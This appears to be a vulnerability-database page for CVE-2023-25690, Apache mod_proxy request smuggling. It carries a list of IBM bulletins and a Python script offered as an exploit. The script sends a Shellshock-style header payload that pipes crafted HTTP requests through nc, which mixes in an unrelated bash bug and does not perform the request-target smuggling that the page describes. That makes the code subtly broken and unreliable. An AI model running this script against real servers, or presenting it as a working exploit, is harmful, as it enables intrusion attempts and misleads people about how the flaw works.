Apache 2.4.55 mod_proxy HTTP Request Smuggling

🗓️ 02 Jan 2024 00:00:00Reported by Amirhossein BahramizadehType

packetstorm🔗 packetstormsecurity.com👁 9711 Views

Apache 2.4.55 HTTP Request Smuggling vulnerabilit

Reporter	Title	Published	Views	Family All 276
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in IBM HTTP Server used by WebSphere Application Server affect IBM Business Automation Workflow (CVE-2023-25690)	21 Mar 202310:02	–	ibm
IBM Security Bulletins	Security Bulletin: IBM HTTP Server (powered by Apache) for IBM i is vulnerable to HTTP request splitting attacks due to an error using mod_proxy (CVE-2023-25690).	29 Aug 202321:19	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities affect IBM Tivoli Monitoring included WebSphere Application Server and IBM HTTP Server used by WebSphere Application Server	31 Aug 202319:46	–	ibm
IBM Security Bulletins	Security Bulletin: IBM HTTP Server is vulnerable to HTTP request splitting due to the included Apache HTTP Server (CVE-2023-25690)	4 Apr 202316:02	–	ibm
IBM Security Bulletins	Security Bulletin: A security vulnerability has been identified in IBM HTTP Server shipped with IBM Rational ClearCase [CVE-2023-25690]	28 Mar 202307:48	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Cloud Pak for Security includes components with multiple known vulnerabilities	7 Jun 202316:53	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities have been identified in OpenSSL, Apache HTTP Server and other system libraries shipped with the DS8000 Hardware Management Console (HMC)	12 Jul 202311:03	–	ibm
IBM Security Bulletins	Security Bulletin: Cloud Pak System is vulnerable to HTTP request splitting attack.	1 Oct 202419:35	–	ibm
IBM Security Bulletins	Security Bulletin: IBM WebSphere Application Server shipped with IBM Security Access Manager for Enterprise Single Sign-On uses IBM HTTP Server that is vulnerable to HTTP request splitting (CVE-2023-25690)	29 Mar 202304:38	–	ibm
IBM Security Bulletins	Security Bulletin: Security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for April 2023	28 Apr 202314:09	–	ibm

`# Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through  
# 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected  
# when mod_proxy is enabled along with some form of RewriteRule or  
# ProxyPassMatch in which a non-specific pattern matches some portion of the  
# user-supplied request-target (URL) data and is then re-inserted into the  
# proxied request-target using variable substitution. For example, something  
# like: RewriteEngine on RewriteRule "^/here/(.*)" "  
# http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/  
# http://example.com:8080/ Request splitting/smuggling could result in bypass  
# of access controls in the proxy server, proxying unintended URLs to  
# existing origin servers, and cache poisoning. Users are recommended to  
# update to at least version 2.4.56 of Apache HTTP Server.  
  
import requests  
  
def send_exploit(proxy_url):  
exploit_headers = {  
'User-Agent': '() { :; }; /bin/echo -e "GET /here/../here HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /nonexistent HTTP/1.1\r\nHost: www.example.com\r\n\r\n" | nc example.com 80',  
'Connection': 'close'  
}  
  
exploit_url = 'http://example.com/here/../here'  
response = requests.get(exploit_url, headers=exploit_headers, proxies={'http': proxy_url, 'https': proxy_url})  
  
print(response.text)  
  
# Usage  
send_exploit('http://localhost:8080')  
`

02 Jan 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.8

EPSS0.67011